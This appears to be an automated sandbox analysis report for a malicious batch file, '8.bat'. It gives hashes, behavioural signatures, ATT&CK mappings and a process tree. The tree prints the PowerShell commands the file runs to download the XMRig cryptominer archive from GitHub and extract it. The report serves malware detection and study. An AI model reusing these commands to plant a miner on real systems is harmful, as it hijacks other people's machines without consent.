Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:54

General

  • Target

    8.bat

  • Size

    599B

  • MD5

    798b979417aa88e5323ead9be2d8425c

  • SHA1

    a54c5133c71afddf697f302b36bdb930c72852ce

  • SHA256

    f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07

  • SHA512

    a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\8.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1824
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1856
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2756

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    39f1c5187ccfd9694651d9778979193b

    SHA1

    4f34b2c85999125944985036d80f3ac3983810c7

    SHA256

    c99a8b85fab1588bf0c9d3ee90fd9cb284a44a69fd977799bfb70c5984c88490

    SHA512

    ce76f797084b782212f32e173b8bc8fd602f235c1147820ba9bcb731c6f406a7df56a059330e0b37c028ce01d9b5a0a8c25cca2a006547b74687394d8f34bd07

  • memory/1856-4-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp
    Filesize

    4KB

  • memory/1856-7-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
    Filesize

    9.6MB

  • memory/1856-6-0x0000000002960000-0x0000000002968000-memory.dmp
    Filesize

    32KB

  • memory/1856-8-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
    Filesize

    9.6MB

  • memory/1856-5-0x000000001B520000-0x000000001B802000-memory.dmp
    Filesize

    2.9MB

  • memory/1856-9-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
    Filesize

    9.6MB

  • memory/1856-10-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
    Filesize

    9.6MB

  • memory/2756-16-0x000000001B7A0000-0x000000001BA82000-memory.dmp
    Filesize

    2.9MB

  • memory/2756-17-0x0000000001D10000-0x0000000001D18000-memory.dmp
    Filesize

    32KB